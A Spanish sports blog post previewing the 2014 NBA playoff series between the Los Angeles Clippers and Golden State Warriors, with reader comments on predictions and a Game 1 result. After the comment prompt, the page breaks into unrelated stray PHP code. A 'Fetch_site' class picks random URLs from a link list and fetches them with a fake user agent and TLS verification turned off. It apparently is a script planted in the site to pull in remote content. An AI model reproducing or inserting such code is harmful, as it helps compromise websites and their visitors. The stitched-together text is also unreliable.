PO 2014: Previa Los Angeles Clippers – Golden State Warriors

17 de April de 2014 por Hynreck

Una de las series más atractivas de primera ronda (casi me atrevería a decir la más atractiva) será la que enfrente al otrora vecino pobre de Los Angeles a los chicos de la bahía. La serie, ya bonita de por sí, no carecerá de la incipiente rivalidad entre ambos conjuntos que va a más en cada partido en el que se enfrentan. Para muestra, repasemos lo sucedido en los últimos partidos que les han enfrentado: el banquillo de GSW mofandose de Blake Griffin, roces entre el propio Blake y Draymond Green, entre Blake y Bogut, entre Bogut y Paul, codazos, expulsiones, tensión… La serie va a estar caliente en cada uno de los partidos. Intensidad no va a faltar desde luego, en juego parece haber algo más que el pase a unas semifinales de conferencia.

Los Clippers vienen de cerrar su mejor campaña histórica. De la mano de Doc Rivers parecen haber encontrado el equilibrio que buscaban desde hace un par de años. Blake Griffin por fin ha dado el salto de calidad que se esperaba de él, ha desarrollado un tiro a media distancia muy efectivo y sigue siendo la bestia atlética de siempre. La sorpresa ha sido la eclosión de su compañero en la pintura, De Andre Jordan, quien viene de cuajar tambien su mejor temporada. La segunda unidad encabezada por el incobustible Jamaal Crawford ha funcionado de maravilla. Reddick y Dudley cumplen sobradamente con su rol y la profundidad de la plantilla es tremenda: Matt Barnes, Darren Collison, Glen Davis… Realmente son aspirantes a todo.

Los Warriors por su parte se presentaban a principios de temporada con uno de los mejores quintetos de la liga y con un sexto hombre de lujo como Harrison Barnes. Con estos mimbres muchos los considerábamos serios candidatos al anillo. Sin embargo la temporada ha sido un poco decepcionante,  un “sí pero…”. En realidad sólo les separan 7 partidos de los Clippers, así que no se puede calificar la temporada como mala ni mucho menos, pero algo más sí que se esperaba. Marc Jackson ha sido bastante cuestionado por Oackland e incluso ha sonado en varias ocasiones su destitución. Andre Iguodala, flamante fichaje estrella, no ha respondido a su estatus en la liga. Siempre aportará defensa e intangibles pero en un rol tan secundario no brilla especialmente. La doble mala noticia es la regresión que ha traído consigo en un Harrison Barnes que tampoco se ha adaptado a su nueva función. Y eso que Klay Thompson sigue siendo uno de los tiradores más temilbles de la liga, que Andrew Bogut ha tenido una temporada aceptablemente sana y que David Lee ha seguido haciendo sus números cercanos al 20-10. Sencillamente, pues eso, que esperábamos algo más.

Claves de la eliminatoria

  • En la pintura: Partiendo de que Bogut será duda, los internos de GSW intentarán sacar del partido a Blake Griffin. Una de las claves será como responda éste a las provocaciones. Griffin tambien reparte lo suyo y goza de cierta bula arbitral por lo que su criterio también será importante. Por otro lado Bogut y DeAndre son grandes jugadores defensivos pero con poco protagonismo en ataque, por lo que es posible que no tengan a quien defender. Jermaine O´Neal tendrá bastantes minutos para exigir algo más a Jordan. Jordan y Bogut, debido a sus estrepitosos problemas con los tiros libres, serán candidatos a pasarse tiempo en el banquillo cuando lleguen los minutos finales de los partidos apretados.
  • En el perímetro: Si en la pintura la ventaja es de los Clippers, en el perímetro la balanza se inclina del lado de los Warriors. Klay Thompson, Iguodala y Barnes deberían imponerse a Reddick, Crawford y Dudley. Barnes (Harrison), explotó en los playoffs el pasado curso. Se le espera como agua de mayo, y podría ser el factor X de este duelo.
  • La segunda unidad: Aquí sí que parece haber una ventaja clara para los chicos de Rivers. Como hemos comentado anteriormente, es una de las más productivas de la liga, con mucha profundidad de banquillo. En cambio, enfrente se echa mucho de menos a Jarret Jack y Carl Landry. Ni Jordan Crawford ni Steve Blake han aportado ni de cerca lo que daba Jack. Landry era muy dificil de sustituir, y ahí tan solo el incombustible Jermaine O´Neal y Draymond Green son capaces de dar minutos de calidad.
  • EL DUELO: Con mayusculas. Note el lector, que hasta ahora he evitado nombrar a los dos bases de ambos equipos. Este duelo merece un capítulo aparte y seguramente nos falte espacio para explicar la admiración que nos profesan ambos. Chris Paul vs. Stephen Curry, quizá los 2 mejores playmakers de la liga. Una delicia cada jugada. Tan parecidos y tan diferentes. El increíble manejo de balón de ambos, la visión de juego, el poderío ofensivo de Curry, la defensa de Paul… una locura. Un Curry desatado es imparable y cuando entra en trance parece que todo lo que tira va dentro, cuando no, es capaz de repartir juego como el mejor. Contra él Paul, el PG por excelencia, capaz de generar juego, de hacer subir el nivel a todos sus compañeros, capaz de anular a cualquiera…. Yo no me lo perdería, en este duelo soy incapaz de pronunciarme, así que simplemente me sentaré a disfrutarlo.

Pronóstico: La inconsistencia de GSW, así como el factor cancha para los Clippers me hace inclinarme por el pase de éstos. 4-2 para Doc Rivers y los suyos.

Comenta

17 comentarios a esta entrada

  1. Denise dice:
    #1

    Yo también le doy un 4-2 a Clippers, pero no descartaría que los Warriors se lo zumbaran. GSW a pesar de una temporada algo irregular tiene un plantillón, y el ambiente del Oracle es muy jodido. Respecto a lo de Landry, no sé yo…, Jermaine ha dado muy buenos minutos, y luego está un tipo que me encanta, Speights…irregular como él solo, pero cuando tiene el día bueno es un revulsivo peligrosisimo.

      Citar

  2. Esteban dice:
    #2

    siendo disentir amigo Hynreck, pero Dudley no cumple a la perfeccion ningun rol, nisiquiera es titular y pasa varios juegos sin entrar en cancha

    Di a los Clippers en el analisis previo perdiendo en primera ronda,puesto que me temia una seria como esta, pero con ventaja de localia a favor de los Warriors

    Los clippers han cambiado mucho desde el inicio del curso a la actualidad (nuevo roster en el juego interior, dudly fuera del 5 inicial, granger como tirador desde el banco, y sin Mullens y Jamison), pero hay que reconocer que el paso al frente lo ha dado Griffin, jugando su mejor temporada en la liga y Jordan mejorando su faceta reboteado (lo he visto jugar ultimamente, y en otras facetas no ha mejorado en absoluto)

    por su parte los Warriors, han hecho caer en desgracia a Barnes, una estrella en ciernes, y no han jugado de modo parejo en casi todo el curso

    Por lo tanto, si bien los di a los Clippers fuera de primera ronda, creo que podran pasar la misma, no son sufrir, pero coincido con el 4-2 a favor de ellos,

      Citar

  3. TheDeerHunter dice:
    #3

    Les doy 4-1, porque Bogut no va a jugar lo que queda de temporada. Sin él la cosa se les pone demasiado cuesta arriba, porque los Clippers además no van cortos de interiores.
    Siempre queda el factor de lo que te pueda liar Curry, pero veo a los Clippers superiores y por dentro pueden hacer mucho daño.
    Por cierto, yo sí creo que Dudley cumple correctamente con su rol. Lógicamente no se le puede pedir una aportación brutal. Es cierto que es preferible que no sea titular, pero ha jugado bastante (74 partidos – Más de 23 minutos por partido) y te aseguro que Doc Rivers no le mete tanto por su cara bonita.

      Citar

  4. Esteban dice:
    #4

    TheDeerHunter:
    Les doy 4-1, porque Bogut no va a jugar lo que queda de temporada. Sin él la cosa se les pone demasiado cuesta arriba, porque los Clippers además no van cortos de interiores.
    Siempre queda el factor de lo que te pueda liar Curry, pero veo a los Clippers superiores y por dentro pueden hacer mucho daño.
    Por cierto, yo sí creo que Dudley cumple correctamente con su rol. Lógicamente no se le puede pedir una aportación brutal. Es cierto que es preferible que no sea titular, pero ha jugado bastante (74 partidos – Más de 23 minutos por partido) y te aseguro que Doc Rivers no le mete tanto por su cara bonita.

    esta confirmado que bogut no jugara?

    de los 74 juegos de Dudley y el promedio de minutos, la mayoria fueron durante los primeros 30 o 40 juegos de la temporada donde falto por lesione Barnes, una vez estado este en condiciones, a salido siempre de titular y Dudley a perdido minutos y partidos ententeros

    ultimamente a vuelto a ver accion, mas que por meritos propios por problemas fisicos de Granger y Torkuglu quienes lo habian sacado de la rotacion

    lo plantedo del 4-2 lo ponia en virtud de que esperaba ver a bogut, si este no juega, las posibilidades de una barrida son muchas

    aunque… sin bogut y jugando con lee de centro y barnes de 4, a lo Don Nelson, corriendo y tirando, la cosa puede salir para cualquier lado, sino que nos lo cuente Dirk y los mavs

      Citar

  5. CAMPO2 dice:
    #5

    Discrepo con lo de Iguodala, es el primer jugador de la liga en la estadística +/-, en ataque no hace falta que tenga tanto protagonismo debido que están los Splash Brothers, y no tengo dudas de que si se le exige que anote mas lo hará, para mi es de los jugadores MAS INFRAVALORADOS de la liga.

    A Harrison Barnes lo mataron el día que llego Iguodala y no ha sabido adaptarse a su rol de sexto hombre,

      Citar

  6. Esteban dice:
    #6

    CAMPO2:
    Discrepo con lo de Iguodala, es el primer jugador de la liga en la estadística +/-, en ataque no hace falta que tenga tanto protagonismo debidoque están los Splash Brothers, y no tengo dudas de que si se le exige que anote mas lo hará, para mi es de los jugadores MAS INFRAVALORADOS de la liga.

    A HarrisonBarnes lo mataron el día que llego Iguodala y no ha sabido adaptarse a su rol de sexto hombre,

    comparto totalmente, la llegada de iguodala debio haber significado un trade por barnes quien cuajo unos PO para el recuerdo, ahora vale la mitad o menos de lo que valia al comienzo de temporada

    no comparto con que barnes no haya sabido adaptarse a su rol de sexto hombre, creo que simplemente no puedo hacerlo mejor, es un jugador duro de rol y de equipo, no tiene suficiente calidad individual para ingresar desde el baco y hacer sentir su presencia como si ´puede hacer crawford o sexto hombres mas individualistas

      Citar

  7. Sancho88 dice:
    #7

    La progresión de Barnes podría haber ido en correlación con la de Jimmy Butler, más o menos. He estado mirando sus estadísticas de esta temporada por 36 minutos y Butler tiene ligeramente mejores números en robos, tapones y pérdidas, pero Barnes lo supera ligeramente en tiro exterior y en rebotes. Pero estoy hablando de décimas. Ya digo, con un rol de titular Harrison Barnes tendría bastantes mejores números

      Citar

  8. TheDeerHunter dice:
    #8

    Butler es un hombre clave en los sistemas defensivos de los Bulls y se come unas minutadas que no se las salta un galgo. Imprescindible. Nada que ver con Barnes, que este año no ha hecho nada a derechas.
    Lo único comparable en términos negativos para Jimmy es el tiro, en el que tampoco ha estado nada fino. En todo lo demás… “pura sangre” Butler.

      Citar

  9. Ruxixon dice:
    #9

    Muchísimas ganas de ver esta eliminatoria.El año pasado confiaba en los Warriors contra los Nuggets en 1ª ronda,pero esta temporada,con todo el runrun en torno a la figura de Marc Jackson,y sobre todo,con un equipo como los Clippers en frente,que han mejorado este año con Rivers en el banquillo,no les doy muchas posibilidades,básicamente porque no les veo llevándose un partido del Staples.4-2 parece lo suyo.

    Cierto el parón en la progresión de Barnes respecto a la temporada pasada,pero no difieren tanto sus números.Recuerdo que la mejor imagen de Barnes llegó en los PO,y este año va a ser muy importante en el quinteto junto a Draymond Green en el small ball teniendo en cuenta las bajas.

      Citar

  10. Jose Luis dice:
    #10

    Lamentable final de partido de Paul, con una pérdida estando 2 abajo a falta de 24 segundos y después fallando un tiro libre con 3 abajo (el segundo lo falla aposa para buscar rebote)

      Citar

  11. Jose Luis dice:
    #11

    fallan dos tiros libres los warriors, y en la lucha por el rebote pisa la linea lateral collison… otros dos tiros para warriors, 105-108

      Citar

  12. Jose Luis dice:
    #12

    falla Klay Thompson el primero… mete el segundo, y victoria 105-109

    Y esto…

    Estás publicando comentarios demasiado rápido. Frena.

    XDDDDD

      Citar

  13. Gastón dice:
    #13

    Vamos Warriors!!!! Que gusto me ha dado que ganen a los Clippers!!

      Citar

  14. rumbero dice:
    #14

    Que final de partido tan horrible para lo bonito que ha estado el partido. CP3 capaz de lo mejor y lo peor. Y Griffin y sus gilipolleces…es para darle

      Citar

  15. Jose Luis dice:
    #15

    Griffin es inmaduro digan lo que digan… en los clippers hace números y se lo pasa bien, pero es momento de PO… en fin.

      Citar

  16. Sancho88 dice:
    #16

    Pues de momento, sorpresas en ambas eliminatorias, al menos sobre el papel. Han ganado los dos equipos de fuera, los que tenían peor record. Pero esto son Playoffs, aquí hay ciertas cosas que tienen su peso, y otras no tanto. De nada vale hacer números en la regular si luego llega el momento de la verdad y esos números no se traducen en victorias. La bronca de Rivers a los suyos habrá sido épica… otra vez tenemos a los sopresivos Warriors. Qué equipo tan desconcertante… capaces de lo mejor y de lo peor. A ver adónde llegan porque eran la cenicienta del Oeste junto a Dallas, por lo menos para mí

      Citar

  17. Ruxixon dice:
    #17

    Como “pronosticador” soy una joya,jajaj.En fin,quien tiene boca se equivoca.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>